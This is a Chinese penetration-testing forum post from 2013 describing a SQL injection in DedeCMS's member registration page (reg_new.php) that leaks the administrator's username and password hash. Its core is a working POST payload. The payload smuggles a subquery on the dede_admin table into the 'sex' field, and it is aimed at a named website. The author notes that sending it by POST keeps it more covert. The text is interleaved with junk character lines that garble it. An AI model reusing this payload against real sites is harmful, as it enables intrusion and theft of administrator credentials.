中国网络渗透测试联盟
标题:
织梦SQL注入漏洞再利用
[打印本页]
作者:
admin
时间:
2013-1-19 08:25
标题:
织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
3 s) L, P+ }# @$ z
简要描述:
( h1 V; i/ N1 l" Q4 P# ]
0 r# P: q+ g5 i0 u- c
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
' H3 q" J. f4 m
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
7 c Z8 c; N) }0 M4 @ W) s" d
详细说明:跟这个漏洞
- V* T: s/ V. W2 o I
, L7 b. u9 V G% @, g& ^
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
- p! A. q* p8 t; B. a( D
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
( X( c$ A% f# F8 Z
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
' d H4 X3 e* }7 x+ O/ o
) x. m5 |5 X* k% e3 {
www.political-security.com/member/reg_new.php
8 M! f1 Z4 |% f6 H: W) q: {9 b% O
7 [! Z c; o- X% A0 L: [. C
POST
' M9 N% }. K' F9 o7 |
- j5 z a1 o% S
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
# x. s% P+ W7 j w- k7 q
userid=c4rp3nt3r&uname=c4rp3nt3r
/ ^7 V- l% \# _/ c7 M
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
7 @: V8 w5 Z2 H8 |
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
# [3 e! S! K3 J+ v6 W0 H( `
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
/ S7 E) I. F# o+ ]# c' B
%00&vdcode=glos&agree=
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2